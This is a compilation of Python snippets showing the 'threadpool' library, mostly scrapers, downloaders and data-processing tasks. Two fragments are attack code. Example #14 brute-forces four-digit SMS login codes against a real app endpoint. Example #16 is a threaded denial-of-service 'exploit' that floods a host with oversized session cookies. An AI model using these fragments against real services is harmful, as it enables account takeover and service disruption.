Example #1
    def getNameSet(self):
        reload(sys)
        sys.setdefaultencoding('utf-8')
        # sys.setdefaultencoding('gbk')
        pool = threadpool.ThreadPool(10)

        # # Get search pages from IEEE by keyword
        # for keyword in keywords:
        #     url = '%s%s%s%s' % ('http://ieeexplore.ieee.org/search/searchresult.jsp?', 'queryText=', keyword, rangeYear)
        #     pageUrlQueue.put(url)
        # requests = threadpool.makeRequests(self.getIeeePages, keywords)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/ieeePages.txt')

        # # Get search pages from ACM by keyword
        # for keyword in keywords:
        #     url = '%s%s' % ('http://dl.acm.org/results.cfm?query=', keyword)
        #     pageUrlQueue.put(url)
        # requests = threadpool.makeRequests(self.getACMPages, keywords)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/acmPages.txt')

        # # Get all document URLs from the IEEE search pages
        # pageUrls = open("searchPages/ieeePages.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getIeeeDocuments, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.docWrite('docUrls/ieeeDocs.txt')

        # # Get all document URLs from the ACM search pages
        # pageUrls = open("searchPages/acmPages.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getACMAuthors, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.docWrite('docUrls/acmDocs.txt')

        # # Get all author names from the ACM document pages
        # pageUrls = open("docUrls/acmDocs.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getACMName, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.acmWrite('names/acmNames.txt')

        # # Get search pages from Elsevier by keyword
        # for keyword in keywords:
        #     url = '%s%s%s' % ('https://www.elsevier.com/search-results?query=', keyword, '&labels=all')
        #     pageUrlQueue.put(url)
        # numbers = range(0, 10)
        # requests = threadpool.makeRequests(self.getElsDocs, numbers)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/elsevierPages.txt')

        # Get all author names from the IEEE document URLs
        num = range(0, 10)
        pageUrls = open("docUrls/ieeeDocs.txt").readlines()
        for page in pageUrls:
            pageUrlQueue.put(page)
        requests = threadpool.makeRequests(self.getIeeeName, num)
        [pool.putRequest(req) for req in requests]
        pool.wait()
Example #2
def judeg_id_list(all_tag_list, cluster_item_tag_abpath_list, result_id_path,
                  cut_pic_name, cluster_id_name, IPC_check, mode,
                  cluster_id_search_range_list):
    cp_list = []
    fun_var = []
    for tag in all_tag_list:
        flag = 0
        id_term = ""
        result_list = my_finds(tag, 0, cluster_item_tag_abpath_list)
        cluster_id_name_flag = 0
        cut_pic_name_flag = 0
        ipc_num_flag = 0
        for result_item in result_list:
            if cluster_id_name_flag == 0:
                if cluster_id_name not in result_item[1]:  # check whether the identity info clustered successfully
                    continue
                else:
                    id_term = result_item[1].split(path_char)[-1].split(".")[0]
                    if mode == "multi_pic":
                        id_term = result_item[1].split(path_char)[-2]
                    cluster_id_name_flag = 1

            # apply the time-range restriction
            id_search_range_find = my_find(id_term, 0,
                                           cluster_id_search_range_list)
            if id_search_range_find != []:
                id_search_range = id_search_range_find[1:]
            if result_item[1] not in id_search_range:
                continue

            if mode == "check_pic":
                if ipc_num_flag == 0:
                    print result_item[1]
                    ipc_num = result_item[1].split(path_char)[-2].split("_")[0]
                    if ipc_num not in IPC_check:
                        continue
                    else:
                        ipc_num_flag = 1
            else:
                if cut_pic_name_flag == 0:
                    if cut_pic_name not in result_item[1]:  # check whether it contains other-camera info
                        continue
                    else:
                        cut_pic_name_flag = 1
            if mode == "check_pic":
                if not os.path.exists(os.path.join(result_id_path, id_term)):
                    print "mkdir", os.path.join(result_id_path, id_term)
                    os.mkdir(os.path.join(result_id_path, id_term))
                flag = 1
                break
            else:
                flag = 1
                break

        if flag == 1:
            cnt = 0
            for result_item in result_list:
                # apply the time restriction
                id_search_range_find = my_find(id_term, 0,
                                               cluster_id_search_range_list)

                cnt = cnt + 1
                print cnt, "/", len(result_list)
                if cluster_id_name in result_item[1]:
                    print "check-proc"
                    print result_item[1]
                    print os.path.join(result_id_path, id_term,
                                       id_term + ".jpg")
                    json_path = result_item[1].split(".")[0] + ".json"
                    #shutil.copyfile(result_item[1],os.path.join(result_id_path,id_term,id_term + ".jpg"))
                    if mode == "check_pic":
                        cp_list.append([
                            result_item[1],
                            os.path.join(result_id_path, id_term,
                                         id_term + ".jpg")
                        ])
                        cp_list.append([
                            json_path,
                            os.path.join(result_id_path, id_term,
                                         id_term + ".json")
                        ])
                #elif mode == "multi_pic":
                #    for img in os.listdir(result_item[1]):
                #        img_path = os.path.join(result_item[1], img)
                #        cp_list.append([img_path, os.path.join(result_id_path, id_term, img)])
                else:
                    print "multi-proc"
                    print result_item[1]

                    if id_search_range_find != []:
                        id_search_range = id_search_range_find[1:]
                    if result_item[1] not in id_search_range:
                        continue

                    for img in os.listdir(result_item[1]):
                        img_path = os.path.join(result_item[1], img)
                        #print img_path
                        #print os.path.join(result_id_path, id_term, img)
                        #shutil.copyfile(img_path,os.path.join(result_id_path, id_term, img))
                        cp_list.append([
                            img_path,
                            os.path.join(result_id_path, id_term, img)
                        ])

    # for ele in cp_list:
    #     try:
    #         shutil.copyfile(ele[0],ele[1])
    #     except Exception as e:
    #         print(e)

    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
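Note: fun_var above is a list of ([args], kwargs) tuples; threadpool.makeRequests unpacks each tuple's first element as positional arguments for the worker. The cp_exec worker itself is not shown in this example, so the sketch below is an assumption: a minimal copy helper matching the ([cpfile_A, cpfile_B, i, total], None) layout, with placeholder file names.

# Hypothetical cp_exec-style worker for the ([src, dst, i, total], None) tuples above.
import shutil
import threadpool

def cp_exec(src, dst, idx, total):
    try:
        shutil.copyfile(src, dst)
    except (IOError, OSError) as e:
        print(e)
    print("copied %d/%d" % (idx + 1, total + 1))

fun_var = [(["a.jpg", "b.jpg", 0, 1], None), (["a.json", "b.json", 1, 1], None)]
pool = threadpool.ThreadPool(10)
for req in threadpool.makeRequests(cp_exec, fun_var):
    pool.putRequest(req)
pool.wait()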
Example #3
exception_handler = logging.FileHandler('exception.log')

process_handler.setFormatter(formatter)
exception_handler.setFormatter(formatter)

process_log.addHandler(process_handler)
exception_log.addHandler(exception_handler)

# image URL prefix
prefix = 'http://image.media.lianjia.com'
subprefix = '!m_fit,w_300,h_300'
# download images by url

# queue of image file names to save
req_queue = Queue.Queue(256)
download_pool = threadpool.ThreadPool(16)
# request id
global request_id
request_id = int(time.time())
q = threading.Lock()

# Parse the data in the request and put it into the queue
# Args:
#     req_data: the request data
# Returns:
#        None


def download_and_generate_hash(img_url, result, ret, request_seq):
    try:
        # check whether img_url is empty
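The comment block above describes a request parser whose body is cut off in this excerpt. A minimal sketch under stated assumptions: req_data is a JSON payload, and the 'imgUrls' field name is hypothetical, not from the original code.

# Hypothetical sketch of the request parser described above: pull image
# URLs out of the payload and enqueue them for the download pool.
import json

def parse_request(req_data):
    data = json.loads(req_data)
    for img_url in data.get('imgUrls', []):  # 'imgUrls' is an assumed field name
        req_queue.put(img_url)  # req_queue is the Queue defined above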
Example #4
def multi_run(uids, keyword):
    pool = threadpool.ThreadPool(10)
    args_list = [{'uid': uid, 'keyword': keyword} for uid in uids]
    reqs = threadpool.makeRequests(run, args_list)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
Example #5
def get_output2(data):
    pool = threadpool.ThreadPool(40)
    requests = threadpool.makeRequests(find_ans2, data)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #6
from common.common_test import *
"""
References:
    (forgotten which website)
    "Core Python Programming"
Contents:
    1. using threadpool
    2. threading_demo.py uses ThreadPoolExecutor from concurrent.futures
    ...
"""

# specify which of programs 1-7 to run, or [0] to run them all
exe_list = [0]

print('1. using threadpool')


def func(num):
    print('num:' + repr(num))


if is_exec_curr(exe_list, 1) and __name__ == '__main__':
    res = list(range(100))
    pool = threadpool.ThreadPool(20)  # 20 threads
    # build all the work requests: the first argument is the function, the second the list of argument values
    requests = threadpool.makeRequests(func, res)
    for request in requests:
        pool.putRequest(request)
    # [pool.putRequest(request) for request in requests]  # equivalent to the for loop above
    pool.wait()  # wait for all worker threads to finish
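The docstring's second item mentions ThreadPoolExecutor from concurrent.futures; for comparison, a minimal standard-library sketch equivalent to the snippet above (Python 3, no third-party install) could be:

# Stdlib equivalent of the threadpool snippet above, for comparison only.
from concurrent.futures import ThreadPoolExecutor

def func(num):
    print('num:' + repr(num))

if __name__ == '__main__':
    with ThreadPoolExecutor(max_workers=20) as executor:
        executor.map(func, range(100))  # all tasks finish before the with-block exits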
Example #7
            flag = 1
        except Exception as e:
            print(userid + "****" + "Error!!! " + e.message + "\n")
            errorTime += 1
            time.sleep(10)
    if flag == 1:
        successusers.append(userid)
    if len(successusers) % 25 == 0:
        writer = open('D:\users\\v-zhaozl\Weibo\\' + "Success", 'w')
        for s in successusers:
            writer.write(s + "\n")
        writer.close()
    print(userid + " End")


all_the_text = []
file_object = open('D:\users\\v-zhaozl\Weibo\weiboids.txt', 'r')
try:
    all_the_text = file_object.read()
finally:
    file_object.close()

userids = []
for text in all_the_text.split("\n"):
    userids.append(text.split("\t")[1])

pool = threadpool.ThreadPool(10)
requests = threadpool.makeRequests(threadFun, userids)
[pool.putRequest(req) for req in requests]
pool.wait()
Example #8
                shop_name
        ) > 0 and '共<span id="J_resCount">0</span>件商品' not in response.text:
            msg = shop_name
            vender_id = doc("#vender_id").val()
            if vender_id and len(vender_id) > 0:
                print(shop_name)
            else:
                msg = '空'
        else:
            msg = '无'
        file_info = str(shopId) + "\t" + str(vender_id) + "\t" + msg
        with open(cross_files, "a+", encoding='utf-8') as w:
            w.write(file_info)
            w.write('\n')

        gc.collect()
    except IOError:
        gc.collect()
        time.sleep(3)
        run_page(shopId)


make_data()

del cross_start
pool = thread_pool.ThreadPool(15)
rt = thread_pool.makeRequests(run_page, shop_list)
[pool.putRequest(req) for req in rt]
pool.wait()
print('Done!')
Example #9

def md5(s):
    m = hashlib.md5()
    m.update(s.encode("utf-8"))
    return m.hexdigest()


gdict = {
    'todo_url_list': set(),
    'all_url_list': set(),
}
all_url_list = set()
undonejobs = dict()
threadnum = 16
downpool = threadpool.ThreadPool(threadnum // 2)  # integer division keeps the pool size an int on Python 3
pagepool = threadpool.ThreadPool(threadnum)
downlock = threading.Lock()
tasknum = 0


def unifyurl(baseurl, href):
    # handle relative urls
    if baseurl is not None:
        baseurl = baseurl.strip()  # strip whitespace
    if href is not None:
        href = href.strip()
    if baseurl is not None:
        if href.startswith('//'):
            href = baseurl.split('//')[0] + href
        elif href.startswith('/'):
Example #10
    OSTYPE = 'windows'
elif 'posix' in os.name:
    OSTYPE = 'linux'
else:
    Log.info('unrecognized OS type')
    sys.exit(-1)

# Set proxy info; needed when the server cannot reach the internet directly
if 'ON' in use_proxy:
    socks.set_default_proxy(socks.SOCKS5, PROXY_HOST, PROXY_PORT, True,
                            PROXY_USER, PROXY_PAWD)
    socket.socket = socks.socksocket

# Read the thread count from config and start the thread pool; orders are processed in parallel over time and id
threadNum = inCfg['TOOL']['thread']
pool = threadpool.ThreadPool(int(threadNum))

# A manual run takes 2 arguments: satellite name and time range
if len(args) == 2:
    Log.info(u'Manual run of the ordering program -----------------------------')

    satID = args[0]  # full satellite name
    str_time = args[1]  # time range for this run

    # Parse the time range: YYYYMMDD-YYYYMMDD into datetime start and end times
    date_s, date_e = pb_time.arg_str2date(str_time)

    # Redefine the time list according to the data rules
    NumDateDict1 = {}
    NumDateDict2 = {}
    # Build the parameter list to pass to the thread pool
Example #11
#coding=utf8
import threadpool
import time
import urllib2

urls = [
    'http://www.163.com', 'http://www.amazon.com', 'http://www.ebay.com',
    'http://www.alibaba.com'
]


def myRequest(url):
    resp = urllib2.urlopen(url)
    print url, resp.getcode()


def timeCost(request, n):
    print "Elapsed time: %s" % (time.time() - start)


start = time.time()
pool = threadpool.ThreadPool(4)  # ThreadPool(poolsize): at most poolsize worker threads are created
reqs = threadpool.makeRequests(
    myRequest, urls,
    timeCost)  #makeRequests(some_callable, list_of_args, callback)
[pool.putRequest(req) for req in reqs]
pool.wait()
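The callback passed as makeRequests' third argument receives (request, result). The threadpool module also accepts a fourth argument, an exception callback receiving (request, exc_info), which is how per-task errors are surfaced. A small sketch (fetch and the urls are placeholders, not from the example above):

# Result and exception callbacks with threadpool; fetch() is a stand-in worker.
import threadpool

def fetch(url):
    if 'bad' in url:
        raise ValueError('cannot fetch %s' % url)
    return len(url)

def on_result(request, result):
    print('%r -> %r' % (request.args, result))

def on_error(request, exc_info):
    print('%r failed: %s' % (request.args, exc_info[1]))

pool = threadpool.ThreadPool(2)
for req in threadpool.makeRequests(fetch, ['http://a', 'http://bad'],
                                   on_result, on_error):
    pool.putRequest(req)
pool.wait()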
Example #12
import time
import threadpool


# install first with `pip install threadpool` if it is not already installed
# a deliberately slow function, worth running on multiple threads
def get_html(url):
    time.sleep(3)
    print(url)


urls = [i for i in range(10)]  # generate 10 numbers with a list comprehension
pool = threadpool.ThreadPool(10)  # create a thread pool with 10 worker threads

requests = threadpool.makeRequests(get_html, urls)  # build 10 work requests for the pool

for req in requests:  # submit each request to start execution
    pool.putRequest(req)

pool.wait()  # wait for completion
Example #13
 def run(self, ids):
     pool = threadpool.ThreadPool(12)
     request = threadpool.makeRequests(self.spider, ids)
     [pool.putRequest(req) for req in request]
     pool.wait()
Example #14
        'sumbit': 'getMobileCode'
    }
    #submit=getMobileCode&mobile=&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans
    headers = {'User-Agent': '6.0.1 rv:1537 (iPhone; iPhone OS 7.0.4; zh_CN)'}
    url = "http://app6.117go.com/demo27/php/loginAction.php?submit=getMobileCode&mobile=%s&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans" % phone
    try:
        req = requests.get(url, headers=headers, timeout=3)
        print req.url
        req_result = json.loads(req.content)['OK']
    except Exception, e:
        print e
        sys.exit(1)
    if int(req_result) == 0:
        print "code have sent"


if __name__ == '__main__':
    args = []
    status = 0
    if len(sys.argv) != 2:
        print "usage: %s phone" % sys.argv[0]
        sys.exit(1)
    phone = sys.argv[1]
    send_code()
    for i in range(1000, 9999):
        args.append(i)
    pool = tp.ThreadPool(5)
    reqs = tp.makeRequests(checkcode, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
Example #15
 def get(self):
     pool = threadpool.ThreadPool(10)
     requests = threadpool.makeRequests(self._get, self.urls)
     [pool.putRequest(req) for req in requests]
     pool.wait()
Example #16
    _WebTmp = _WebTmp[0]
    _WebTmp = _WebTmp.split('\'')
    _WebTmp = _WebTmp[len(_WebTmp) - 1]
    _WebTmp = _WebTmp.split('=')
    _SessionID = _WebTmp[0]
    _Session = _WebTmp[1]

    for i in range(4000):
        _Session += randomCharacter()

    _Cookies = {_SessionID: _Session}

    while True:
        _Flag += 1
        try:
            _Req = requests.get(_Host, cookies=_Cookies, headers=HEADER)
            print "[%s] DOSing... " % _Flag
            print _Req.content
        except:
            continue


if __name__ == '__main__':
    args = []
    for i in range(THREAD_NUM):
        args.append(i)
    pool = tp.ThreadPool(THREAD_NUM)
    reqs = tp.makeRequests(exploit, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
Example #17
def run(args):
    pool = threadpool.ThreadPool(5)
    requests = threadpool.makeRequests(parseArticleWithAccount, args)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #18
def predict_my(visual=True, model_weight="model_final.pth"):
    cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_weight)
    predictor = DefaultPredictor(cfg)
    cfg.TEST.DETECTIONS_PER_IMAGE = 500
    # test_json= "/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person.json"
    # test_image_path="/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person"
    # test_json="/root/data/gvision/dataset/predict/person/test_person.json"
    # test_image_path="/root/data/gvision/dataset/predict/person/img"
    test_json = "/root/data/rubzz/ruby/ruby_output/test/person/img_testone/test_person_onetest.json"
    test_image_path = '/root/data/rubzz/ruby/ruby_output/test/person/img_testone'
    dataset_test_dicts = json.load(open(test_json, "r"))
    # MetadataCatalog.get("pandahead").set(thing_classes=["head"], thing_dataset_id_to_contiguous_id={1: 0})
    train_dicts_metadata = MetadataCatalog.get("pandahead")
    print("metadata----------------", train_dicts_metadata)
    print("predict-------------------start")
    "thing_classes=['visible body', 'full body', 'head', 'vehicle'], thing_dataset_id_to_contiguous_id={1: 0, 2: 1, 3: 2, 4: 3}"
    os.makedirs(os.path.join(cfg.OUTPUT_DIR, "my_predict"), exist_ok=True)
    # for j,(file_name,dict_value) in  enumerate(random.sample(dataset_test_dicts.items(),5)):

    # pbar = tqdm(total=len(dataset_test_dicts), ncols=50)
    import threadpool
    func_var = [([file_name, dict_value], None)
                for file_name, dict_value in dataset_test_dicts.items()]

    coco_list_results = []  # shared across the worker threads; written out at the end

    def sayhello(file_name, dict_value):
        print("{}------------------{}\t{}".format(
            os.path.join(test_image_path, file_name), model_weight[6:-4],
            len(dataset_test_dicts.keys())),
              flush=True)
        img = cv2.imread(os.path.join(test_image_path, file_name))
        pre_output = predictor(img)
        num_instance = 0
        cid = [0, 0, 0, 0]
        pre_instances = pre_output['instances']
        if "instances" in pre_output and len(pre_instances) != 0:
            coco_list_result, num_instance, cid = instances_to_coco_json(
                pre_instances.to(torch.device("cpu")), dict_value["image id"])
            coco_list_results.extend(coco_list_result)  # extend the shared list rather than rebinding a local
        srcfile, paras = file_name.split('___')
        srcfile = srcfile.replace('_IMG', '/IMG')
        image_id = srcfile[-2:]
        scale, left, up = paras.replace('.jpg', '').split('__')
        if visual and (up == "16480" or up == "12360"):
            print("visual-------------------------", file_name)
            cv2.putText(
                img,
                f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}",
                (15, 80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138, 0, 255), 4)
            v = Visualizer(
                img[:, :, ::-1], metadata=train_dicts_metadata,
                scale=1)  # ColorMode.SEGMENTATION or ColorMode.IMAGE_BW)
            v = v.draw_instance_predictions(
                pre_instances.to("cpu"))  #draw xyxy
            os.makedirs(os.path.join(cfg.OUTPUT_DIR,
                                     "d2_predict_split_visual_17_01"),
                        exist_ok=True)
            cv2.imwrite(
                os.path.join(
                    cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01",
                    "visual{}_{}".format(model_weight[6:-4], file_name)),
                v.get_image()[:, :, ::-1])

    #     pbar.update(1)
    # pbar.close()

    pool = threadpool.ThreadPool(500)
    requests = threadpool.makeRequests(sayhello, func_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()

    # for file_name,dict_value in dataset_test_dicts.items():
    #     # print("{}\t{}------------------{}\t{}".format(os.path.join(test_image_path,file_name),j,model_weight[6:-4],len(dataset_test_dicts.keys())),flush=True)
    #     img=cv2.imread(os.path.join(test_image_path,file_name))
    #     pre_output =predictor(img)
    #     num_instance=0
    #     cid=[0,0,0,0]
    #     pre_instances=pre_output['instances']
    #     if "instances" in pre_output and len(pre_instances)!=0:
    #         coco_list_result,num_instance,cid=instances_to_coco_json(pre_instances.to(torch.device("cpu")),dict_value["image id"])
    #         coco_list_results=coco_list_results+coco_list_result
    #     srcfile, paras = file_name.split('___')
    #     srcfile =srcfile.replace('_IMG', '/IMG')
    #     image_id=srcfile[-2:]
    #     scale, left, up = paras.replace('.jpg', '').split('__')
    #     if visual and (up=="16480" or up=="12360"):
    #         print("visual-------------------------",file_name)
    #         cv2.putText(img, f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}", (15,80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138,0,255), 4)
    #         v = Visualizer(img[:, :, ::-1],metadata=train_dicts_metadata, scale=1)# ColorMode.SEGMENTATION or ColorMode.IMAGE_BW)
    #         v = v.draw_instance_predictions(pre_instances.to("cpu"))#draw xyxy
    #         os.makedirs(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01"),exist_ok=True)
    #         cv2.imwrite(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01","visual{}_{}".format(model_weight[6:-4],file_name)),v.get_image()[:, :, ::-1])
    tempc = os.path.join(
        cfg.OUTPUT_DIR, "my_predict",
        f"{model_weight[6:-4]}_nms{cfg.MODEL.RETINANET.NMS_THRESH_TEST}_fs{cfg.MODEL.RETINANET.SCORE_THRESH_TEST}_17_01.json"
    )
    print(tempc)
    f1 = open(tempc, 'w')
    f1.write(json.dumps(coco_list_results, cls=MyEncoder))
    print("predict----------------end")
Example #19
 def __init__(self, maxsize=20, q_size=20, resq_size=200, name=None):
     #self.workingq = queue.Queue(maxsize)
     self.tpool = threadpool.ThreadPool(maxsize,
                                        q_size=q_size,
                                        resq_size=resq_size)
Example #20
    for district in districts:
        areas_of_district = get_areas(city, district)
        print('{0}: Area list:  {1}'.format(district, areas_of_district))
        # list.extend: L1.extend(L2) appends every element of L2 to the end of L1
        areas.extend(areas_of_district)
        # use a dict to map each area to its district, e.g. {'beicai': 'pudongxinqu'}
        for area in areas_of_district:
            area_dict[area] = district
    print("Area:", areas)
    print("District and areas:", area_dict)

    # prepare the arguments for the thread pool
    nones = [None for i in range(len(areas))]
    city_list = [city for i in range(len(areas))]
    args = zip(zip(city_list, areas), nones)
    # areas = areas[0: 1]   # For debugging

    # one output file per area, each handled by a worker thread
    pool_size = thread_pool_size
    pool = threadpool.ThreadPool(pool_size)
    my_requests = threadpool.makeRequests(collect_area_ershou, args)
    [pool.putRequest(req) for req in my_requests]
    pool.wait()
    pool.dismissWorkers(pool_size, do_join=True)  # dismiss the workers when done

    # stop timing and report the results
    t2 = time.time()
    print("Total crawl {0} areas.".format(len(areas)))
    print("Total cost {0} second to crawl {1} data items.".format(
        t2 - t1, total_num))
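A note on the args construction above: zip(zip(city_list, areas), nones) yields ((city, area), None) tuples, which makeRequests unpacks as two positional arguments for collect_area_ershou plus an empty keyword dict. An equivalent, arguably clearer spelling:

# Equivalent construction of the thread-pool arguments without the double zip.
args = [((city, area), None) for area in areas]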
Example #21
        # if comm_num > 0:  # submit only if there are comments
        #     id_comm_dict[item_id] = get_comm.delay(inner_url, comm_num)

        shop_info_data = get_shop_info(inner_url)

        price = item.select("div.p-price strong i")[0].text
        book_name = item.select('div.p-name em')[0].text
        shop_info_data['book_name'] = book_name
        shop_info_data['price'] = price
        shop_info_data['comm_num'] = comm_num
        shop_info_data['item_id'] = item_id
        print(shop_info_data)
        write_csv(shop_info_data)


if __name__ == '__main__':
    keyword = input('Enter the book to search for: ')
    urls = []
    for i in range(5, 7, 2):
        url = 'https://search.jd.com/Search?keyword={}&suggest=1.def.0.V05--38s0&wq={}&page={}&s=101&click=0'.format(
            keyword, keyword, i)

        urls.append(([
            url,
        ], None))
    pool = threadpool.ThreadPool(3)
    reque = threadpool.makeRequests(get_index, urls)
    for c in reque:
        pool.putRequest(c)
    pool.wait()
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36"
}
main_url = "https://www.ixdzs.com"


def get_conn():
    conn = MySQLdb.connect(host='localhost',
                           port=3306,
                           user='******',
                           passwd='',
                           db='jianghuiyan',
                           charset='utf8')
    return conn


task_pool = threadpool.ThreadPool(15)

request = requests.session()
request.keep_alive = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_response(url):
    for i in range(1, 4):
        try:
            response = request.get(url, timeout=10, verify=False)
            return response
        except BaseException as e:
            print(e)
            print("获取" + url + "失败")
Example #23
def thread_main(item):
    pool = threadpool.ThreadPool(4)
    tasks = threadpool.makeRequests(get_detail, item)
    [pool.putRequest(req) for req in tasks]
    pool.wait()
Example #24
    labels = df.values
    m = {}
    for val in labels:
        m[val[0]] = val[1]
    params = []
    idx = 0
    for root, dirs, filenames in os.walk(cfg.data_neg_path):
        for each_tif in filenames:
            if '.tif' in each_tif:
                name = each_tif.split('.')[0]
                flag = 'pos' if m[int(name)] == 'Positive' else 'neg'
                path = os.path.join(root, each_tif)  # ./EDCP/data_append/1/1.tif
                out_patch_path = os.path.join(cfg.patch_data, flag, name)  # ./EDCP_PATCH/pos/1/
                idx += 1
                params.append([path, args.size, args.scale, out_patch_path, args.patch_size, args.nums, args.bin, args.threshold])

    # print(idx)
    cp('(#b)total_img:\t{}(#)'.format(idx))
    pool = threadpool.ThreadPool(args.poolsize)
    requests = threadpool.makeRequests(work, params)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #25
def login_parser(username, password):
    s = requests.Session()
    s.proxies = constant.PROXY
    s.verify = False
    s.headers.update({'Referer': constant.LOGIN_URL})

    s.get(constant.LOGIN_URL)
    content = s.get(constant.LOGIN_URL).content
    html = BeautifulSoup(content, 'html.parser')
    csrf_token_elem = html.find('input', attrs={'name': 'csrfmiddlewaretoken'})

    if not csrf_token_elem:
        raise Exception('Cannot find csrf token to login')
    csrf_token = csrf_token_elem.attrs['value']

    login_dict = {
        'csrfmiddlewaretoken': csrf_token,
        'username_or_email': username,
        'password': password,
    }
    resp = s.post(constant.LOGIN_URL, data=login_dict)
    if 'Invalid username/email or password' in resp.text:
        logger.error('Login failed, please check your username and password')
        exit(1)

    html = BeautifulSoup(s.get(constant.FAV_URL).content, 'html.parser')
    count = html.find('span', attrs={'class': 'count'})
    if not count:
        logger.error("Can't get your number of favorited doujins. Did the login failed?")

    count = int(count.text.strip('(').strip(')').replace(',', ''))
    if count == 0:
        logger.warning('No favorites found')
        return []
    pages = int(count / 25)

    if pages:
        pages += 1 if count % (25 * pages) else 0
    else:
        pages = 1

    logger.info('You have %d favorites in %d pages.' % (count, pages))

    if os.getenv('DEBUG'):
        pages = 1

    ret = []
    doujinshi_id = re.compile(r'data-id="([\d]+)"')

    def _callback(request, result):
        ret.append(result)

    thread_pool = threadpool.ThreadPool(5)

    for page in range(1, pages + 1):
        try:
            logger.info('Getting doujinshi ids of page %d' % page)
            resp = s.get(constant.FAV_URL + '?page=%d' % page).text
            ids = doujinshi_id.findall(resp)
            requests_ = threadpool.makeRequests(doujinshi_parser, ids, _callback)
            [thread_pool.putRequest(req) for req in requests_]
            thread_pool.wait()
        except Exception as e:
            logger.error('Error: %s, continue', str(e))

    return ret
Example #26
    def __init__(self, config_file, _password):
        """Netconfigit constructor

        Initializes member variables and reads and parses XML configuration file.
        Starts local tftp server and creates temporary directory for holding configs.
        Initializes the device threadpool.

        :param config_file: XML configuration file path
        :param _password: decryption password
        """
        # initialize member variables
        self.device_list = []               # list of device objects defined in the configuration file
        self.device_count = 0               # the number of devices defined in the configuration file
        self.success_list = []              # the list of device actions that have succeeded
        self.failure_list = []                 # the list of device actions that have failed
        self.config = 0                     # the minidom XML configuration data structure
        self.config_devices = 0             # pointer to the device elements in the config minidom structure
        self.tftp_thread = 0                # thread pool for running the local tftp server
        self.device_threadpool = 0          # thread pool for running device actions
        self.password = ""                  # decryption password
        self.verbose = 0                    # verbose logging flag
        self.logfile = "./Netconfigit.log"  # logfile relative path
        self.plaintext_passwords = ""       # boolean value allows use of plaintext passwords in config xml
        self.transfer_ip = ""               # IP address of the local tftp and/or scp server
        self.scp_username = ""              # username used for scp transfer to the local machine
        self.scp_password = ""              # password used for scp transfer to the local machine
        self.scp_chown = ""                 # the group and user to which uploaded files' ownership should be changed
        self.ssh_port = 22                  # port used to ssh to local machine - used by chown
        self.repo_path = ""                 # absolute path to the configuration repository
        self.repo_password = ""             # password for accessing the repository
        self.repository = None              # GitPython repository object
        self.tftp_port = "69"               # port used by local tftp server
        self.tftp_root = ""                 # root directory used by local tftp server
        self.using_git = 0                  # boolean is set to true if the repository directory is a Git repository
        self.tempdir = ".netconfigit/"      # temporary path for downloading configs
        self.time_start = datetime.now()    # starting time timestamp used for calculating total running-time
        self.time_stop = None               # stopping time timestamp used for calculating total running-time
        self.time_timestamp = time.time()               # starting time timestamp

        # formatted timestamp
        self.timestamp = datetime.fromtimestamp(self.time_timestamp).strftime('%Y-%m-%d %H:%M:%S')

        # create the object used for encrypting/decrypting passwords
        self.password = aescrypt.AESCrypt(_password)

        # parse xml configuration file
        self.config = minidom.parse(config_file)
        logging.info("\nUsing %s", config_file)

        # check and load options from XML
        self.options = self.load_options()

        # check existence of devices in configuration
        if self.config.getElementsByTagName('device'):
            self.config_devices = self.config.getElementsByTagName('device')
        else:
            print "\nNo devices specified - quitting"
            exit(1)

        # load devices from XML configuration into device_list
        load_err = self.load_devices_xml()

        if load_err != "0":
            print load_err
            print "Configuration errors detected - quitting"
            exit(1)

        # create temporary directory for receiving configs
        self.tempdir = os.path.dirname(self.tftp_root + self.tempdir)
        try:
            os.stat(self.tempdir)
        except os.error:
            os.mkdir(self.tempdir)
            logger.info("Creating temporary directory " + self.tempdir)

        # initialize the thread used for the local tftp server and start the server
        self.tftp_thread = threadpool.ThreadPool(1)
        self.tftp_thread.add_task(self.tftp_server)

        # initialize the thread pool used by device actions
        logger.info("Creating %s device threads", 20)
        self.device_threadpool = threadpool.ThreadPool(20)
Example #27
